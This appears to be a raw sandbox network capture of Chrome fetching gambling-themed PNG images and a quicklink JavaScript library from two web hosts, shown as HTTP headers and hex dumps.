                                          2025-01-12 00:17:10 UTC5294INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 fa 00 00 00 fa 08 03 00 00 00 bf 32 aa 0f 00 00 01 83 50 4c 54 45 00 00 00 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 26 2d 35 25 2c 33 26 2d 33 ff ff ff 26 2e 35 23 2a 32 25 2c 32 29 30 38 23 28 2f 19 20 29 1c 23 2b 2c 33 3a 1f 27 2f 15 1c 24 22 25 2c 5c cc f1 5c cd f5 7c 80 85 ed ee ee 38 3e 45 22 22 27 29 37 41 e0 e2 e3 b8 ba bd 42 7e 96 57 c0 e2 2c 3e 48 20 1c 21 2f 48 54 46 4c 52 6b 71 75 70 75 7a ce cf d1 4b 50 56 5d d0 f8 3b 6b 7e 3d 6c 80 61 67 6b 56 ba dd 5a c8 ee 58 c2 e7 32 4f 5d 5b ca f0 b2 b4 b8 5f d8 ff 5f d5 fd fa fa fa f5 f5 f6 10 18 1f 63 e2 ff 47 8f a9 c2 c5 c7 3d
                                          Data Ascii: PNGIHDR2PLTE&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5&-5%,3&-3&.5#*2%,2)08#(/ )#+,3:'/$"%,\\|8>E""')7AB~W,>H !/HTFLRkqupuzKPV];k~=lagkVZX2O][__cG=


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          109192.168.2.449861122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:10 UTC360OUTGET /imgs/2025fajia.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:11 UTC346INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:10 GMT
                                          Content-Type: image/png
                                          Content-Length: 32644
                                          Last-Modified: Tue, 01 Oct 2024 17:57:38 GMT
                                          Connection: close
                                          ETag: "66fc3812-7f84"
                                          Expires: Tue, 11 Feb 2025 00:17:10 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:11 UTC16038INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 06 f4 00 00 08 cb 08 03 00 00 00 b5 87 ca 90 00 00 00 84 50 4c 54 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc aa 6e b0 00 00 00 2b 74 52 4e 53 00 32 5f e0 43 8d b1 10 f9 85 54 9a 4e 05 0a 70 ef 1a c3 d4 67 cd aa a4 bc 21 77 f4 93 ea 48 38 3d e5 2b 7f 26 14 da 58 c9 b7 7a 8f 1d 2f 83 00 00 7e 84 49 44 41 54 78 da ec c1 81 00 00 00 00 80 a0 fd a9 17 a9
                                          Data Ascii: PNGIHDRPLTEn+tRNS2_CTNpg!wH8=+&Xz/~IDATx
                                          2025-01-12 00:17:11 UTC16384INData Raw: 58 6c 82 bb a7 60 3d bd 7a 19 07 a7 5d 30 5b 5e 75 27 c1 7d 3f 78 eb 04 c7 ed d5 7c 18 08 19 d0 0a dd 73 ef d0 34 f9 cf 3d 37 b7 7a df 58 dd d8 fc 90 8a 68 30 8e 76 d1 32 ea 4e a2 7e d4 89 b6 7a 01 f0 9f 3c 0c 2f b6 37 86 65 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e d9 83 03 01 00 00 00 00 20 ff d7 46 50 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 15 f6 e0 40 00 00 00 00 00 c8 ff b5 11 54 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 85 3d 38
                                          Data Ascii: Xl`=z]0[^u'}?x|s4=7zXh0v2N~z</7eT> FPUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU@TUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU=8
                                          2025-01-12 00:17:11 UTC222INData Raw: 00 00 7c 65 0f 0e 04 00 00 00 00 80 fc 5f 1b 41 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 d8 83 03 01 00 00 00 00 20 ff d7 46 50 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 95 f6 e0 90 00 00 00 00 40 d0 ff d7 6e b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 12 a5 b2 8e 82 97 89 8c db 00 00 00 00 49 45 4e 44 ae 42 60 82
                                          Data Ascii: |e_AUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU FPUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU@nIENDB`


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          110192.168.2.449862122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:10 UTC364OUTGET /imgs/2026shijiebei.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:11 UTC346INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:11 GMT
                                          Content-Type: image/png
                                          Content-Length: 16719
                                          Last-Modified: Tue, 01 Oct 2024 17:57:40 GMT
                                          Connection: close
                                          ETag: "66fc3814-414f"
                                          Expires: Tue, 11 Feb 2025 00:17:11 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:11 UTC16038INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 0c 00 00 01 9b 08 03 00 00 00 06 31 5e 5a 00 00 02 b8 50 4c 54 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b2 9b 5b 00 00 00 ff ff ff 1f 0f 0a 2d 1c 0e bb 95 45 6e 4a 1d 7d 54 21 66 3e 17 94 67 28 10 0d 0c 9c 6c 29 50 2e 11 a3 75 2c aa 79 2c 05 31 1d 55 35 13 40 26 10 ab 80 31 08 26 17 b5 85 33 a3 7d 36 85 5a 23 5c 3a 15 9d 72 2b 2a 14 0b 76 4d 1f 39 23 11 ee df a7 b2 8d 43 76 47 1c 8e 63 27 d7 b9 77 87 5f 26 46 2b 12 0a 1c 12 3b 1b 0d c7 a5 58 01 43 27 b9 8e 41 8c 5d 24 61 41 18 02 53 35 93 60 26 84 53 21 23 17 0b f1 e7 bb 03 3c 23 75 54 22 dc c3 75 c3 9a 44 d5 b5 64 ca aa 61 9a
                                          Data Ascii: PNGIHDR1^ZPLTE[-EnJ}T!f>g(l)P.u,y,1U5@&1&3}6Z#\:r+*vM9#CvGc'w_&F+;XC'A]$aAS5`&S!#<#uT"uDda
                                          2025-01-12 00:17:11 UTC681INData Raw: c5 e9 d9 38 70 a6 8f 25 d1 ad b9 e3 0f 5d 07 bf 0c f7 83 b5 e9 9c 9c f1 d7 5e 2c ff 75 8b 29 fb 65 bc 06 c9 a0 28 ce 47 be c9 45 f2 85 6e 69 54 bf 0c 1b 22 a3 e0 a7 84 43 f8 49 2c 92 ff 53 2d 46 ef 97 51 60 88 8c f6 72 99 86 5e ac a4 46 24 92 3f ab 56 10 f6 cb 68 43 64 34 96 a3 38 df 7d 45 bb 31 92 0d dc cc 1a 63 b1 3d b7 17 22 a3 a6 28 ce 26 bb df 6c 15 c6 b1 06 a5 d4 e5 91 71 c8 cf 64 37 e5 8c 26 bf 70 fc 76 15 4b 67 8a 44 f2 44 b5 49 96 4a e8 e2 ed a5 bd 90 75 7e 18 89 61 a1 d4 56 4f 53 46 b9 75 90 f9 74 7d 04 a5 ea a8 4a 32 28 57 f4 93 63 0c 0f 40 c8 7e 9d e8 c9 d8 f5 59 90 88 e4 89 52 67 3d 4d 19 a7 3e 09 12 91 7c a1 d4 ea 45 51 46 e5 1a 10 5a 4d 5a 42 18 06 03 d0 91 51 bb 06 64 56 93 8c 4e 73 3d 4d 19 b6 a1 41 50 31 b5 c0 6a d2 13 04 92 62 00 2a 32
                                          Data Ascii: 8p%]^,u)e(GEniT"CI,S-FQ`r^F$?VhCd48}E1c="(&lqd7&pvKgDDIJu~aVOSFut}J2(Wc@~YRg=M>|EQFZMZBQdVNs=MAP1jb*2


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          111192.168.2.449863122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:11 UTC364OUTGET /imgs/2025shiyunhui.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:11 UTC346INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:11 GMT
                                          Content-Type: image/png
                                          Content-Length: 27838
                                          Last-Modified: Tue, 01 Oct 2024 17:57:38 GMT
                                          Connection: close
                                          ETag: "66fc3812-6cbe"
                                          Expires: Tue, 11 Feb 2025 00:17:11 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:11 UTC16038INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 35 00 00 01 f1 08 03 00 00 00 3b b8 db 94 00 00 02 9d 50 4c 54 45 ff ff ff fe fe fa 33 2a 29 fa fa f8 35 2c 2c 36 30 2f fe fa fd 2b 24 23 f1 31 64 84 58 b6 24 1f 1e f6 f5 f4 7c 51 b6 f5 ff fd fb 41 79 f4 38 6a 21 19 19 f6 3c 70 2e 2a 27 e7 e6 19 01 01 01 68 41 a5 77 49 b4 4d af e6 63 bd 93 57 ae e2 8c 5d b4 70 45 b1 5c 5a 59 3c b0 e7 44 af e9 3a 35 35 eb 2b 5d e0 23 56 ec e6 12 35 b1 ec 60 af 1e bc 10 3d fc ea 05 d4 19 4a 6e ac dd 1d 17 17 69 45 af 74 70 6f 60 ba 9a da 1f 50 fe ff f0 9f 09 2e f4 e7 13 70 9a d6 f5 e9 08 4f 58 b5 5f ae e2 7a bc 39 a7 0c 32 e4 2b 5d 75 a8 dd 28 b3 eb ec e5 1b b6 0f 3a c5 c4 c3 94 92 91 40 3c 3b e5 e3 2a ae 0c 35 8b 88 87 62 81 c7 47 44 43 67 ab e2 87 62 b5 e2 e1 e0 54
                                          Data Ascii: PNGIHDR5;PLTE3*)5,,60/+$#1dX$|QAy8j!<p.*'hAwIMcW]pE\ZY<D:55+]#V5`=JniEtpo`P.pOX_z92+]u(:@<;*5bGDCgbT
                                          2025-01-12 00:17:11 UTC11800INData Raw: 6a 64 da 54 e6 63 a6 3f b6 4f 29 bd 1d 7b d3 0a a5 58 a4 53 dd 68 b7 98 ba 2c c4 00 e5 10 64 43 6e bb 8a 3d b8 0d 72 40 01 1e fc dd 4a 46 0d 9b 77 7b ed c4 91 02 9c 67 43 bb d3 f6 ea a8 b3 12 8b 96 e0 e0 69 3e b6 f9 3c 37 f8 96 25 0c d4 ad 46 c7 7d a6 01 2f c7 80 52 8d 38 cc 47 4c 6e 16 da 53 fe 41 b1 fd f1 90 ed 33 27 bf dd aa e1 3b c0 0e 8d 7d 13 b6 8a c4 96 33 64 d9 e3 c5 78 3f 3a 57 41 77 36 1e d5 6f 3a 9a 5d 1c f8 cf a3 f6 ea 7d 11 7e 71 ff 6b 3b d5 53 b6 6f 04 35 88 79 cf a2 d7 44 49 4c 1e 1a e8 ed 93 38 3a 76 21 fb a3 85 ba 18 83 ed 37 a0 d1 be 23 bb c3 f1 3a 04 60 8a b9 36 37 a3 8e e4 8c 0d 60 2b 7e d4 07 5d f2 b4 48 84 5a e2 1a ae f5 a1 87 11 34 70 5b 8d 7c f7 34 24 1e 37 e2 2b f3 4c 57 1d c8 31 40 79 d6 36 67 d4 72 6f 5f 32 15 cd da 14 6a 1b 6f
                                          Data Ascii: jdTc?O){XSh,dCn=r@JFw{gCi><7%F}/R8GLnSA3';}3dx?:WAw6o:]}~qk;So5yDIL8:v!7#:`67`+~]HZ4p[|4$7+LW1@y6gro_2jo


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          112192.168.2.449864122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:11 UTC358OUTGET /quicklink.umd.js HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:12 UTC378INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:12 GMT
                                          Content-Type: application/javascript
                                          Content-Length: 3711
                                          Last-Modified: Sun, 28 Jul 2024 08:53:58 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "66a60726-e7f"
                                          Expires: Sun, 12 Jan 2025 12:17:12 GMT
                                          Cache-Control: max-age=43200
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:12 UTC3711INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6e 28 65 78 70 6f 72 74 73 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 5d 2c 6e 29 3a 6e 28 65 2e 71 75 69 63 6b 6c 69 6e 6b 3d 7b 7d 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 2c 74 29 7b 28 74 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 29 2e 6f 70 65 6e 28 22 47 45
                                          Data Ascii: !function(e,n){"object"==typeof exports&&"undefined"!=typeof module?n(exports):"function"==typeof define&&define.amd?define(["exports"],n):n(e.quicklink={})}(this,function(e){function n(e){return new Promise(function(n,r,t){(t=new XMLHttpRequest).open("GE


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          113192.168.2.449866122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:11 UTC357OUTGET /imgs/yongli.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:12 UTC345INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:12 GMT
                                          Content-Type: image/png
                                          Content-Length: 7076
                                          Last-Modified: Tue, 01 Oct 2024 15:31:18 GMT
                                          Connection: close
                                          ETag: "66fc15c6-1ba4"
                                          Expires: Tue, 11 Feb 2025 00:17:12 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:12 UTC7076INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 fa 00 00 00 fa 08 03 00 00 00 bf 32 aa 0f 00 00 02 85 50 4c 54 45 00 00 00 a2 85 78 93 72 63 9e 82 74 90 70 61 7f 60 4f 5f 3d 2e 79 52 3f 8d 6e 60 7f 5b 4b 49 24 1a 65 3b 24 9e 83 75 ac 92 85 5d 2f 13 74 4a 33 98 74 64 86 67 58 a4 82 71 ac 8a 7f 44 0c 00 67 39 1b 75 54 47 5b 27 0b 5f 33 1a 4e 29 1b 5d 32 1b 8b 66 55 8f 69 55 82 55 40 7a 52 42 59 36 19 6f 46 2e 6c 46 33 8e 71 61 80 5b 4b 60 35 1f 79 50 3a 8e 6b 5b 79 57 46 5a 30 1d 67 40 31 5d 31 10 7a 54 43 59 34 1c 5e 29 12 70 41 1b 62 36 23 7c 58 45 9d 7d 6d 68 40 2e 66 3c 24 6b 42 2c 81 60 51 a6 90 83 90 6d 5a 7c 5d 4f 3c 08 06 5c 2a 13 7a 55 40 5f 39 24 7f 51 3b 3a 0d 02 88 67 57 72 46 32 9b 7d 6c 66 41 31 63 34 14 63 37 1d 51 23 0b 63 36 20 87
                                          Data Ascii: PNGIHDR2PLTExrctpa`O_=.yR?n`[KI$e;$u]/tJ3tdgXqDg9uTG['_3N)]2fUiUU@zRBY6oF.lF3qa[K`5yP:k[yWFZ0g@1]1zTCY4^)pAb6#|XE}mh@.f<$kB,`QmZ|]O<\*zU@_9$Q;:gWrF2}lfA1c4c7Q#c6


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          114192.168.2.449865122.10.50.2104435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:11 UTC355OUTGET /imgs/bwin.png HTTP/1.1
                                          Host: 1k4ej4j1lxvjwz.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:12 UTC345INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:12 GMT
                                          Content-Type: image/png
                                          Content-Length: 5376
                                          Last-Modified: Fri, 04 Oct 2024 20:16:00 GMT
                                          Connection: close
                                          ETag: "67004d00-1500"
                                          Expires: Tue, 11 Feb 2025 00:17:12 GMT
                                          Cache-Control: max-age=2592000
                                          Strict-Transport-Security: max-age=31536000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:12 UTC5376INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 fa 00 00 00 fa 08 03 00 00 00 bf 32 aa 0f 00 00 02 4f 50 4c 54 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 0d 0c 0c 09 08 09 03 03 02 ff e9 0e ff ed 0f de de de ff d4 0d ff ce 0d ff d1 0d ff d9 0d ff d3 0d 24 24 24 ff d6 0d ff df 0d 0a 08 00 fd fc fe bf be bf 1f 1f 1f ff e3 0e ff e6 0e 2d 25 02 32 32 32 ff e1 0e ff f0 0f 94 93 94 93 77 07 b2 90 09 10 0f 10 a4 a4 a6 2a 2a 2b 13 11 10 09 07 06 75 5f 06 33 28 02 f2 f2 f3 88 85 86 5e 5e 5e e1 b6 0b d2 aa 0b fa fa fa 18 17 17 15 15 15 ff cc 0d e2 e2 e2 38 2d 02 bb b9 bb 4e 4d 4e ff db 0d 1d 1b 19 cc a6 0a e6 e4 ee e5
                                          Data Ascii: PNGIHDR2OPLTE$$$-%222w**+u_3(^^^8-NMN


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          115192.168.2.449867154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:17 UTC408OUTGET /__local/2/47/D4/4F14A7A9A01E0D52B998F0FADA0_DD410FA8_1601EC.png?e=.png HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:18 UTC305INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:17 GMT
                                          Content-Type: image/png
                                          Content-Length: 1442284
                                          Last-Modified: Fri, 10 Jan 2025 07:04:33 GMT
                                          Connection: close
                                          ETag: "6780c681-1601ec"
                                          Expires: Tue, 11 Feb 2025 00:17:17 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:18 UTC16079INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 b4 00 00 02 08 08 06 00 00 00 9f 36 7d d4 00 00 00 09 70 48 59 73 00 00 12 74 00 00 12 74 01 de 66 1f 78 00 00 20 00 49 44 41 54 78 01 00 cc 81 33 7e 01 ae b4 c2 ff 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 02 02 02 00 00 00 00 00 00 ff 00 00 01 00 00 00 01 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 01 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 ff
                                          Data Ascii: PNGIHDR6}pHYsttfx IDATx3~
                                          2025-01-12 00:17:18 UTC16384INData Raw: 01 01 00 00 00 00 01 00 01 01 00 00 00 00 01 00 00 00 01 00 01 01 01 00 00 00 00 00 01 01 01 00 ff 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 01 00 00 01 00 00 00 00 01 00 01 01 01 00 00 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 01 00 01 00 01 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 00 00 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 01 ff
                                          Data Ascii:
                                          2025-01-12 00:17:18 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff 00 00 00 00 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 00 ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 01 00 01 ff ff 00 02 01 01 00 00 00 00 00 00
                                          Data Ascii:
                                          2025-01-12 00:17:18 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 01 01 00 00 00 ff 00 00 00 00 fe 00 00 01 00 00 00 ff ff 00 00 01 00 00 ff ff 01 00 01 01 00 00 00 00 00 00 00 00 01 00 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 01 00 01 00 01 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00
                                          Data Ascii:
